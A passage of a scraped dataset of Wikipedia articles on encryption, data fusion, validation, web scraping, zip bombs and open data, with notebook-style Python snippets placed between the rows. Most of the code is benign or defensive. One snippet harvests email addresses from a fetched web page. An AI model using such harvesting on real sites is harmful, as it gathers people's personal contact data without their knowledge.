Standards for cryptographic software and hardware to perform encryption are widely available, but successfully using encryption to ensure security may be a challenging problem. A single error in system design or execution can allow successful attacks. Sometimes an adversary can obtain unencrypted information without directly undoing the encryption. See for example traffic analysis, TEMPEST, or Trojan horse. 42 Integrity protection mechanisms such as MACs and digital signatures must be applied to the ciphertext when it is first created, typically on the same device used to compose the message, to protect a message end-to-end along its full transmission path; otherwise, any node between the sender and the encryption agent could potentially tamper with it. Encrypting at the time of creation is only secure if the encryption device itself has correct keys and has not been tampered with. If an endpoint device has been configured to trust a root certificate that an attacker controls, for example, then the attacker can both inspect and tamper with encrypted data by performing a man-in-the-middle attack anywhere along the message's path. The common practice of TLS interception by network operators represents a controlled and institutionally sanctioned form of such an attack, but countries have also attempted to employ such attacks as a form of control and censorship. 43 Even when encryption correctly hides a message's content and it cannot be tampered with at rest or in transit, a message's length is a form of metadata that can still leak sensitive information about the message. For example, the well-known CRIME and BREACH attacks against HTTPS were side-channel attacks that relied on information leakage via the length of encrypted content. 44 Traffic analysis is a broad class of techniques that often employs message lengths to infer sensitive information about traffic flows by aggregating information about a large number of messages. Padding a message's payload before encrypting it can help obscure the cleartext's true length, at the cost of increasing the ciphertext's size and introducing or increasing bandwidth overhead. Messages may be padded randomly or deterministically, with each approach having different tradeoffs. Encrypting and padding messages to form padded uniform random blobs or PURBs is a practice guaranteeing that the ciphertext leaks no metadata about its cleartext's content, and leaks asymptotically minimal O(log log M) information via its length. 45 |
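The length-leakage point above can be illustrated with a minimal padding sketch: before encryption, each plaintext is padded up to a fixed bucket size, so messages of different lengths produce ciphertexts of identical size. This is a simplified stand-in for schemes such as PURBs, not an implementation of them, and the bucket size is an arbitrary choice.
import os
import struct

BUCKET = 512  # arbitrary fixed bucket size in bytes

def pad_to_bucket(plaintext: bytes, bucket: int = BUCKET) -> bytes:
    # Prefix the true length, then fill with random bytes up to the bucket size.
    if len(plaintext) + 4 > bucket:
        raise ValueError("message too long for a single bucket")
    header = struct.pack(">I", len(plaintext))
    return header + plaintext + os.urandom(bucket - 4 - len(plaintext))

def unpad(padded: bytes) -> bytes:
    (length,) = struct.unpack(">I", padded[:4])
    return padded[4:4 + length]

short = pad_to_bucket(b"yes")
long_ = pad_to_bucket(b"the quarterly results were worse than expected")
assert len(short) == len(long_) == BUCKET  # identical sizes before encryption
assert unpad(short) == b"yes"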
334 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_fusion | Data fusion is the process of integrating multiple data sources to produce more consistent, accurate, and useful information than that provided by any individual data source. Data fusion processes are often categorized as low, intermediate, or high, depending on the processing stage at which fusion takes place. 1 Low-level data fusion combines several sources of raw data to produce new raw data. The expectation is that fused data is more informative and synthetic than the original inputs. For example, sensor fusion is also known as (multi-sensor) data fusion and is a subset of information fusion. The concept of data fusion has origins in the evolved capacity of humans and animals to incorporate information from multiple senses to improve their ability to survive. For example, a combination of sight, touch, smell, and taste may indicate whether a substance is edible. 2 In the mid-1980s, the Joint Directors of Laboratories formed the Data Fusion Subpanel (which later became known as the Data Fusion Group). With the advent of the World Wide Web, data fusion thus included data, sensor, and information fusion. The JDL/DFIG introduced a model of data fusion that divided the various processes. Currently, the Data Fusion Information Group (DFIG) model comprises six levels. Although the JDL model (Levels 1-4) is still in use today, it is often criticized for its implication that the levels necessarily happen in order and also for its lack of adequate representation of the potential for a human-in-the-loop. The DFIG model (Levels 0-5) explored the implications of situation awareness, user refinement, and mission management. 3 Despite these shortcomings, the JDL/DFIG models are useful for visualizing the data fusion process, facilitating discussion and common understanding, 4 and important for systems-level information fusion design. 3 5 In the geospatial (GIS) domain, data fusion is often synonymous with data integration. In these applications, there is often a need to combine diverse data sets into a unified (fused) data set which includes all of the data points and time steps from the input data sets. The fused data set is different from a simple combined superset in that the points in the fused data set contain attributes and metadata which might not have been included for these points in the original data set. A simplified example of this process fuses one data set with a second data set to form a single fused data set. Data points in the first set have spatial coordinates X and Y and attributes A1 and A2. Data points in the second set have spatial coordinates X and Y and attributes B1 and B2. The fused data set contains all points and attributes. In a simple case where all attributes are uniform across the entire analysis domain, the attributes may simply be assigned to the corresponding fused points. In a real application, attributes are not uniform and some type of interpolation is usually required to properly assign attributes to the data points in the fused set. In a much more complicated application, marine animal researchers use data fusion to combine animal tracking data with bathymetric, meteorological, sea surface temperature (SST) and animal habitat data to examine and understand habitat utilization and animal behavior in reaction to external forces such as weather or water temperature. 
Each of these data sets exhibits a different spatial grid and sampling rate, so a simple combination would likely create erroneous assumptions and taint the results of the analysis. But through the use of data fusion, all data and attributes are brought together into a single view in which a more complete picture of the environment is created. This enables scientists to identify key locations and times and form new insights into the interactions between the environment and animal behaviors. In one such study, rock lobsters were tracked off the coast of Tasmania. Hugh Pederson of the University of Tasmania used data fusion software to fuse southern rock lobster tracking data (color-coded in yellow and black for day and night, respectively) with bathymetry and habitat data to create a unique 4D picture of rock lobster behavior. In applications outside of the geospatial domain, differences in the usage of the terms data integration and data fusion apply. In areas such as business intelligence, for example, data integration is used to describe the combining of data, whereas data fusion is integration followed by reduction or replacement. Data integration might be viewed as set combination wherein the larger set is retained, whereas fusion is a set reduction technique with improved confidence. The data from different sensing technologies can be combined in intelligent ways to determine the traffic state accurately. A data fusion based approach that utilizes roadside collected acoustic, image and sensor data has been shown to combine the advantages of the different individual methods. 6 In many cases, geographically dispersed sensors are severely energy- and bandwidth-limited. Therefore, the raw data concerning a certain phenomenon are often summarized in a few bits from each sensor. When inferring on a binary event (i.e., hypothesis H0 or H1), in the extreme case only binary decisions are sent from sensors to a Decision Fusion Center (DFC) and combined in order to obtain improved classification performance. 7 8 9 With a multitude of built-in sensors, including motion sensors, environmental sensors, and position sensors, a modern mobile device typically gives mobile applications access to a number of sensory data which could be leveraged to enhance contextual awareness. Using signal processing and data fusion techniques such as feature generation, feasibility study and principal component analysis (PCA), such sensory data can greatly improve the positive rate of classifying the motion and contextually relevant status of the device. 10 Many context-enhanced information techniques are provided by Snidaro, et al. 11 12 Gaussian processes are a popular machine learning model. If an auto-regressive relationship between the data is assumed, and each data source is assumed to be a Gaussian process, this constitutes a non-linear Bayesian regression problem. 13 Many data fusion methods assume common conditional distributions across several data sources. 14 Recently, methods have been developed to enable efficient estimation within the resulting semiparametric model. 15 |
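A minimal version of the point-attribute fusion described in this article can be sketched with pandas (already imported earlier in this notebook): two point sets sharing X and Y coordinates are merged so that the fused set carries both attribute groups. The coordinates and attribute values below are invented for illustration, and a real workflow would typically interpolate rather than require exact coordinate matches.
import pandas as pd

# Hypothetical point sets on the same X/Y grid with different attributes.
set_a = pd.DataFrame({"X": [0, 0, 1], "Y": [0, 1, 1], "A1": [2.0, 2.5, 3.0], "A2": [7, 8, 9]})
set_b = pd.DataFrame({"X": [0, 1, 1], "Y": [0, 0, 1], "B1": [0.1, 0.2, 0.3], "B2": [5, 6, 7]})

# Low-level fusion by exact coordinate match; an outer join keeps every point
# from both inputs, with NaN where an attribute was not observed at a point.
fused = pd.merge(set_a, set_b, on=["X", "Y"], how="outer")
print(fused)
# In practice the grids rarely line up exactly, so attributes are usually
# assigned to fused points by interpolation (e.g. nearest neighbour).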
335 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_validation | In computing, data validation or input validation is the process of ensuring data has undergone data cleansing to confirm it has data quality, that is, that it is both correct and useful. It uses routines, often called "validation rules", "validation constraints", or "check routines", that check for correctness, meaningfulness, and security of data that are input to the system. The rules may be implemented through the automated facilities of a data dictionary, or by the inclusion of explicit application program validation logic of the computer and its application. This is distinct from formal verification, which attempts to prove or disprove the correctness of algorithms for implementing a specification or property. Data validation is intended to provide certain well-defined guarantees for fitness and consistency of data in an application or automated system. Data validation rules can be defined and designed using various methodologies, and be deployed in various contexts. 1 Their implementation can use declarative data integrity rules, or procedure-based business rules. 2 The guarantees of data validation do not necessarily include accuracy, and it is possible for data entry errors such as misspellings to be accepted as valid. Other clerical and/or computer controls may be applied to reduce inaccuracy within a system. In evaluating the basics of data validation, generalizations can be made regarding the different kinds of validation according to their scope, complexity, and purpose. For example: Data type validation is customarily carried out on one or more simple data fields. The simplest kind of data type validation verifies that the individual characters provided through user input are consistent with the expected characters of one or more known primitive data types as defined in a programming language or data storage and retrieval mechanism. For example, an integer field may require input to use only characters 0 through 9. Simple range and constraint validation may examine input for consistency with a minimum/maximum range, or consistency with a test for evaluating a sequence of characters, such as one or more tests against regular expressions. For example, a counter value may be required to be a non-negative integer, and a password may be required to meet a minimum length and contain characters from multiple categories. Code and cross-reference validation includes operations to verify that data is consistent with one or more possibly-external rules, requirements, or collections relevant to a particular organization, context or set of underlying assumptions. These additional validity constraints may involve cross-referencing supplied data with a known look-up table or directory information service such as LDAP. For example, a user-provided country code might be required to identify a current geopolitical region. Structured validation allows for the combination of other kinds of validation, along with more complex processing. Such complex processing may include the testing of conditional constraints for an entire complex data object or set of process operations within a system. Consistency validation ensures that data is logical. For example, the delivery date of an order can be prohibited from preceding its shipment date. Multiple kinds of data validation are relevant to 10-digit pre-2007 ISBNs (the 2005 edition of ISO 2108 required ISBNs to have 13 digits from 2007 onwards 3 ). 
Failures or omissions in data validation can lead to data corruption or a security vulnerability. 4 Data validation checks that data are fit for purpose, 5 valid, sensible, reasonable and secure before they are processed. |
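The validation categories described above map naturally onto small, composable check functions. The hedged sketch below shows one way to express type, range, regular-expression, cross-reference and consistency rules in Python; the field names and the country-code lookup table are invented for illustration.
import re

KNOWN_COUNTRY_CODES = {"US", "GB", "DE", "IN", "JP"}  # hypothetical lookup table

def validate_record(record: dict) -> list:
    """Return a list of human-readable validation errors (empty if valid)."""
    errors = []
    # Data-type validation: the counter must contain digits only.
    if not re.fullmatch(r"[0-9]+", str(record.get("counter", ""))):
        errors.append("counter must be a non-negative integer")
    # Range/constraint validation: password length and character categories.
    pw = record.get("password", "")
    if len(pw) < 8 or not (re.search(r"[A-Za-z]", pw) and re.search(r"[0-9]", pw)):
        errors.append("password must be 8+ characters with letters and digits")
    # Code/cross-reference validation against a known directory.
    if record.get("country") not in KNOWN_COUNTRY_CODES:
        errors.append("unknown country code")
    # Consistency validation: delivery cannot precede shipment (ISO date strings).
    if record.get("delivery_date") and record.get("shipment_date"):
        if record["delivery_date"] < record["shipment_date"]:
            errors.append("delivery date precedes shipment date")
    return errors

print(validate_record({"counter": "12", "password": "s3cretpw", "country": "US",
                       "shipment_date": "2024-01-02", "delivery_date": "2024-01-05"}))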
336 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-4 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the long tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A further approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
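Both extraction styles mentioned above, regular-expression matching and DOM parsing, are available through the requests, re and BeautifulSoup imports at the top of this notebook. The sketch below applies them to a single page; the URL is a placeholder, and in practice the site's terms of use and robots.txt should be honoured.
import re
import requests
from bs4 import BeautifulSoup

url = "https://example.com/"              # placeholder; substitute a permitted page
html = requests.get(url, timeout=10).text

# 1) grep-style extraction: a regular expression over the raw HTML.
emails = re.findall(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", html)

# 2) DOM parsing: build a tree and query it structurally.
soup = BeautifulSoup(html, "html5lib")
title = soup.title.string if soup.title else None
links = [a.get("href") for a in soup.find_all("a", href=True)]

print(title, len(links), len(emails))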
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include: BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browsewrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
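The list of administrator-side countermeasures was not captured in the scraped text above, but from the scraper's side the usual courtesies are to consult robots.txt and to throttle requests. The hedged sketch below uses only the standard library; the base URL, paths and user-agent string are placeholders.
import time
from urllib.robotparser import RobotFileParser

BASE = "https://example.com"      # placeholder site
USER_AGENT = "my-research-bot"    # placeholder user agent

robots = RobotFileParser()
robots.set_url(BASE + "/robots.txt")
robots.read()

for path in ["/", "/about", "/data"]:
    url = BASE + path
    if not robots.can_fetch(USER_AGENT, url):
        print("Disallowed by robots.txt, skipping:", url)
        continue
    print("Would fetch:", url)   # fetch here, e.g. with requests.get(url)
    time.sleep(2)                # simple rate limiting to avoid overloading the server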
337 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Referencing_for_beginners | One of the key policies of Wikipedia is that all article content has to be verifiable. This means that reliable sources must be able to support the material. All quotations, any material whose verifiability has been challenged or is likely to be challenged, and contentious material (whether negative, positive, or neutral) about living persons must include an inline citation to a source that directly supports the material. This also means that Wikipedia is not the place for original work, archival findings that have not been published, or evidence from any source that has not been published. If you are adding new content, it is your responsibility to add sourcing information along with it. Material provided without a source is significantly more likely to be removed from an article. Sometimes it will be tagged first with a "citation needed" template to give editors a chance to find and add sources, but some editors will simply remove it because they question its veracity. This tutorial will show you how to add inline citations to articles, and also briefly explain what Wikipedia considers to be a reliable source. Inline citations are usually small, numbered footnotes like this. 1 They are generally added either directly following the fact that they support, or at the end of the sentence that they support, following any punctuation. When clicked, they take the reader to a citation in a reference section near the bottom of the article. While editing a page that uses the most common footnote style, you will see inline citations displayed between <ref>...</ref> tags. If you are creating a new page, or adding references to a page that didn't previously have any, remember to add a References section near the end of the article. Note: This is by far the most popular system for inline citations, but sometimes you will find other styles being used in an article. This is acceptable, and you shouldn't change it or mix styles. To add a new reference, just copy and modify an existing one. Manually adding references can be a slow and tricky process. Fortunately, there is a tool called "RefToolbar" built into the Wikipedia edit window, which makes it much easier. To use it, click on Cite at the top of the edit window, having already positioned your cursor after the sentence or fact you wish to reference. Then select one of the 'Templates' from the dropdown menu that best suits the type of source. A template window then pops up, where you fill in as much information as possible about the source, and give a unique name for it in the "Ref name" field. Click the "Insert" button, which will add the required wikitext in the edit window. If you wish, you can also "Preview" how your reference will look first. Some fields (such as a web address, also known as a URL) will have an icon next to them. After filling in this field, you can click it to handily autofill the remaining fields. It doesn't always work properly, though, so be sure to double check it. Often, you will want to use the same source more than once in an article to support multiple facts. In this case, you can click Named references in the toolbar, and select a previously added source to re-use. As an alternative to the RefToolbar, it is possible to insert citations in the source editor using a similar automated tool as the one used in the visual editor. 
For this, you need to enable the 2017 wikitext editor in your preferences. You will then be able to edit the source of pages while inserting citations using the automated tool of the visual editor. Wikipedia articles require reliable, published sources that directly support the information presented in the article. Now you know how to add sources to an article, but which sources should you use? The word "source" in Wikipedia has three meanings: the work itself (for example, a document, article, paper, or book), the creator of the work (for example, the writer), and the publisher of the work (for example, Cambridge University Press). All three can affect reliability. Reliable sources are those with a reputation for fact-checking and accuracy. They tend to have an editorial process with multiple people scrutinizing work before it is published. Academic and peer-reviewed publications are usually the most reliable sources. Other reliable sources include university textbooks, books published by respected publishing houses, magazines, journals, and news coverage (not opinions) from mainstream newspapers. Self-published media, where the author and publisher are the same, are usually not acceptable as sources. These can include newsletters, personal websites, press releases, patents, open wikis, personal or group blogs, and tweets. However, if an author is an established expert with a previous record of third-party publications on a topic, their self-published work may be considered reliable for that particular topic. Whether a source is usable also depends on context. Sources that are reliable for some material are not reliable for other material. For instance, otherwise unreliable self-published sources are usually acceptable to support uncontroversial information about the source's author. You should always try to use the best possible source, particularly when writing about living people. These are general guidelines, but the topic of reliable sources is a complicated one, and is impossible to fully cover here. You can find more information at Wikipedia:Verifiability and at Wikipedia:Reliable sources. There is also a list of commonly used sources with information on their reliability. |
338 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Zip_bomb | In computing, a zip bomb, also known as a decompression bomb or zip of death (ZOD), is a malicious archive file designed to crash or render useless the program or system reading it. The older the system or program, the more likely it is to be caught out by one. It is often employed to disable antivirus software, in order to create an opening for more traditional malware. 1 A zip bomb allows a program to function normally, but, instead of hijacking the program's operation, creates an archive that requires an excessive amount of time, disk space, or memory to unpack. 2 Most modern antivirus programs can detect whether a file is a zip bomb in order to avoid unpacking it. 3 A zip bomb is usually a small file for ease of transport and to avoid suspicion. However, when the file is unpacked, its contents are more than the system can handle. One example of a zip bomb is the file 42.zip, which is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom-layer archive containing a 4.3 gigabyte (4,294,967,295 bytes; 4 GiB minus 1 B) file for a total of 4.5 petabytes (4,503,599,626,321,920 bytes; 4 PiB minus 1 MiB) of uncompressed data. 4 This zip bomb is freely available for download online. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out-of-memory condition, or exceed an acceptable amount of program execution time. Zip bombs often rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level, effectively converting their exponential growth to linear. |
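The 42.zip figures above follow from simple multiplication, and the same idea suggests a defensive check for scraping pipelines that download archives: inspect an archive's declared uncompressed size before extracting anything. The sketch below uses only the standard library; the size ceiling is an arbitrary example, and nested archives additionally require a recursion-depth limit as described above.
import zipfile

# Arithmetic behind 42.zip: five nesting layers in sets of 16, i.e. 16**5 bottom-layer files.
bottom_file = 4_294_967_295            # bytes per bottom-layer file (~4.3 GB)
total = (16 ** 5) * bottom_file        # 4,503,599,626,321,920 bytes (~4.5 PB)
print(f"~{total / 1e15:.2f} PB from a 42 kB archive")

MAX_UNCOMPRESSED = 1 * 1024 ** 3       # arbitrary 1 GiB ceiling

def safe_to_extract(path: str) -> bool:
    # Refuse archives whose declared uncompressed size exceeds the ceiling.
    with zipfile.ZipFile(path) as zf:
        declared = sum(info.file_size for info in zf.infolist())
    return declared <= MAX_UNCOMPRESSED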
339 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Open_data | Open data is data that is openly accessible, exploitable, editable and shareable by anyone for any purpose. Open data is licensed under an open license. 1 2 3 The goals of the open data movement are similar to those of other "open(-source)" movements such as open-source software, open-source hardware, open content, open specifications, open education, open educational resources, open government, open knowledge, open access, open science, and the open web. The growth of the open data movement is paralleled by a rise in intellectual property rights. 4 The philosophy behind open data has been long established (for example in the Mertonian tradition of science), but the term "open data" itself is recent, gaining popularity with the rise of the Internet and World Wide Web and, especially, with the launch of open-data government initiatives Data.gov, Data.gov.uk and Data.gov.in. Open data can be linked data, referred to as linked open data. One of the most important forms of open data is open government data (OGD), which is a form of open data created by ruling government institutions. Open government data's importance is born from it being a part of citizens' everyday lives, down to the most routine mundane tasks that are seemingly far removed from government. The abbreviation FAIR O data is sometimes used to indicate that the dataset or database in question complies with the principles of FAIR data and carries an explicit data-capable open license. The concept of open data is not new, but a formalized definition is relatively new. Open data as a phenomenon denotes that governmental data should be available to anyone with a possibility of redistribution in any form without any copyright restriction. 5 Another definition is the Open Definition, which can be summarized as "a piece of data is open if anyone is free to use, reuse, and redistribute it subject only, at most, to the requirement to attribute and/or share-alike". 6 Other definitions, including the Open Data Institute's "open data is data that anyone can access, use or share", have an accessible short version of the definition but refer to the formal definition. 7 Open data may include non-textual material such as maps, genomes, connectomes, chemical 